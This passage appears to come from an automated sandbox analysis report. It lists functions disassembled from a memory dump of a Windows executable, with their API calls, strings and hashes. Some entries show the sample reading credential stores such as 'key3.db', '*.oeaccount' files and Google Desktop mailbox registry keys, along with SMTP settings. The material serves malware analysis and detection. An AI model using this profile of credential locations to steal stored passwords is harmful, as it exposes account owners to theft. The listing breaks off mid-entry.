                                                                                                                  • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                                  • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                  • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                                  Function 00449550 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0044955B
                                                                                                                  • memset.MSVCRT ref: 0044956B
                                                                                                                  • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpymemset
                                                                                                                  • String ID: gj
                                                                                                                  • API String ID: 1297977491-4203073231
                                                                                                                  • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                  • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                                  • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                  • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                                  Function 0040AB66 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                    • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,`'v,00000000,?,?,0040A7BE,00000001,0044CBC0,76270A60), ref: 00406D4D
                                                                                                                  • memset.MSVCRT ref: 0040AB9C
                                                                                                                    • Part of subcall function 00411004: memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                    • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                    • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                  • sprintf.MSVCRT ref: 0040ABE1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                                                  • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                  • API String ID: 3337535707-2769808009
                                                                                                                  • Opcode ID: 94fb3ee970197c35f89b73c5c9c871d1a7be37581e6fd1bc9edd3009dd58cb65
                                                                                                                  • Instruction ID: d3fada9700ccfca67da5e06a008153287a477451e6e6bd371d19fa9d49944530
                                                                                                                  • Opcode Fuzzy Hash: 94fb3ee970197c35f89b73c5c9c871d1a7be37581e6fd1bc9edd3009dd58cb65
                                                                                                                  • Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98
                                                                                                                  Function 004090B0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetParent.USER32(?), ref: 004090C2
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Rect$ClientParentPoints
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4247780290-0
                                                                                                                  • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                  • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                                  • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                  • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                                  Function 0040B994 Relevance: 7.5, APIs: 5, Instructions: 44windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                                                                                    • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                                                                                                    • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                                                                                  • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                                                                                    • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                                                                                    • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                                                                                    • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                                                                                                    • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                  • SetCursor.USER32(?,?,0040CBD2), ref: 0040B9F9
                                                                                                                  • SetFocus.USER32(?,?,?,0040CBD2), ref: 0040BA0B
                                                                                                                  • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2374668499-0
                                                                                                                  • Opcode ID: c223344c3a39cb50a824543c0933464b2b2e3202265bd74e385ec46d38a17b1f
                                                                                                                  • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                                                                                                                  • Opcode Fuzzy Hash: c223344c3a39cb50a824543c0933464b2b2e3202265bd74e385ec46d38a17b1f
                                                                                                                  • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                                                                                                                  Function 0040AD38 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040AD5B
                                                                                                                  • memset.MSVCRT ref: 0040AD71
                                                                                                                    • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                    • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,`'v,00000000,?,?,0040A7BE,00000001,0044CBC0,76270A60), ref: 00406D4D
                                                                                                                    • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                    • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                  • sprintf.MSVCRT ref: 0040ADA8
                                                                                                                  Strings
                                                                                                                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AD76
                                                                                                                  • <%s>, xrefs: 0040ADA2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                  • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                  • API String ID: 3699762281-1998499579
                                                                                                                  • Opcode ID: f08f26e7c6bf1a33ee1b85fc51aa9ff2daee10922a246ae1c01303c1338e46c2
                                                                                                                  • Instruction ID: d8254de8a9900f2911fb5d1c0b13fc0cc865a5027b69882d7a9a790f368f6919
                                                                                                                  • Opcode Fuzzy Hash: f08f26e7c6bf1a33ee1b85fc51aa9ff2daee10922a246ae1c01303c1338e46c2
                                                                                                                  • Instruction Fuzzy Hash: 49012B7294012877E721A719CC46FDABB6C9F54304F0500F7B50DF3082DBB8AB508BA4
                                                                                                                  Function 00409A32 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76270A60,?,00000000), ref: 00409A3E
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76270A60,?,00000000), ref: 00409A4C
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76270A60,?,00000000), ref: 00409A5D
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76270A60,?,00000000), ref: 00409A74
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76270A60,?,00000000), ref: 00409A7D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 613200358-0
                                                                                                                  • Opcode ID: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                                                                                                  • Instruction ID: b8efe39ffa321d4f2ce8ce974eba3160cbf96dc633dc1e2aadb4e529a4dc2577
                                                                                                                  • Opcode Fuzzy Hash: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                                                                                                  • Instruction Fuzzy Hash: A9F0F4726057855BD7209F6999C1A57F7D9BB98714791083FF189F3A81CB38FC404A18
                                                                                                                  Function 00409A98 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76270A60,?,00000000), ref: 00409A3E
                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76270A60,?,00000000), ref: 00409A4C
                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76270A60,?,00000000), ref: 00409A5D
                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76270A60,?,00000000), ref: 00409A74
                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76270A60,?,00000000), ref: 00409A7D
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AB3
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AC6
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AD9
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AEC
                                                                                                                  • free.MSVCRT ref: 00409B00
                                                                                                                    • Part of subcall function 00407A55: free.MSVCRT ref: 00407A5C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@$free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2241099983-0
                                                                                                                  • Opcode ID: 2269fc206d2d283b797854ae73677064badd7dde056db72ab5a07573cc1b8c0d
                                                                                                                  • Instruction ID: 0e1833da384361268bbd99a4020487bffb4c29eeff2b5ca4c2d3cb4a232d8152
                                                                                                                  • Opcode Fuzzy Hash: 2269fc206d2d283b797854ae73677064badd7dde056db72ab5a07573cc1b8c0d
                                                                                                                  • Instruction Fuzzy Hash: 3FF0A932F068B05BC2117B669002B0EB398AD81B2831A016FF8147B6D2CB3CBC504ADE
                                                                                                                  Function 00410777 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                                                    • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                                                    • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                                                  • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                                                  • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2775283111-0
                                                                                                                  • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                  • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                                                                  • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                  • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                                                  Function 00406AC7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                                                                                                  • CloseHandle.KERNEL32(?,?,00406C55,00000000,?,00000000,?), ref: 00406B11
                                                                                                                    • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407909
                                                                                                                    • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407917
                                                                                                                    • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                                                                                  • String ID: Ul@$key3.db
                                                                                                                  • API String ID: 1968906679-1563549157
                                                                                                                  • Opcode ID: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                                                  • Instruction ID: 1a03c8060d8a16f0d136589656c0636480a797a3ae37aee6ed6b4138e5904ac9
                                                                                                                  • Opcode Fuzzy Hash: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                                                  • Instruction Fuzzy Hash: EA1181B1D00624ABCB10AF25DC8588E7FB5EF45364B15C177F80AEB291D638ED61CB98
                                                                                                                  Function 0040E103 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _strcmpi.MSVCRT ref: 0040E134
                                                                                                                  • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                                  • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _strcmpi$_mbscpy
                                                                                                                  • String ID: smtp
                                                                                                                  • API String ID: 2625860049-60245459
                                                                                                                  • Opcode ID: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                                                  • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                                                  • Opcode Fuzzy Hash: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                                                  • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                                                  Function 0040821D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                  • memset.MSVCRT ref: 00408258
                                                                                                                    • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                                                  Strings
                                                                                                                  • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Close$EnumOpenmemset
                                                                                                                  • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                                  • API String ID: 2255314230-2212045309
                                                                                                                  • Opcode ID: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                                                  • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                                                                                  • Opcode Fuzzy Hash: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                                                  • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                                                                                  Function 0040C26C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040C28C
                                                                                                                  • SetFocus.USER32(?,?), ref: 0040C314
                                                                                                                    • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: FocusMessagePostmemset
                                                                                                                  • String ID: S_@$l
                                                                                                                  • API String ID: 3436799508-4018740455
                                                                                                                  • Opcode ID: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                                  • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                                                  • Opcode Fuzzy Hash: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                                  • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                                                  Function 00407482 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _mbscpy
                                                                                                                  • String ID: C^@$X$ini
                                                                                                                  • API String ID: 714388716-917056472
                                                                                                                  • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                  • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                                                  • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                  • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                                                  Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                    • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                                  • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                  • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                  • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                  • String ID: MS Sans Serif
                                                                                                                  • API String ID: 3492281209-168460110
                                                                                                                  • Opcode ID: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                                  • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                                                  • Opcode Fuzzy Hash: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                                  • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                                                  Function 00407107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ClassName_strcmpimemset
                                                                                                                  • String ID: edit
                                                                                                                  • API String ID: 275601554-2167791130
                                                                                                                  • Opcode ID: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                                  • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                                                  • Opcode Fuzzy Hash: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                                  • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                                                  Function 0040759E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$_mbscat
                                                                                                                  • String ID: 3CD
                                                                                                                  • API String ID: 3951308622-1938365332
                                                                                                                  • Opcode ID: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                                  • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                                                  • Opcode Fuzzy Hash: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                                  • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                                                  Function 00443C44 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
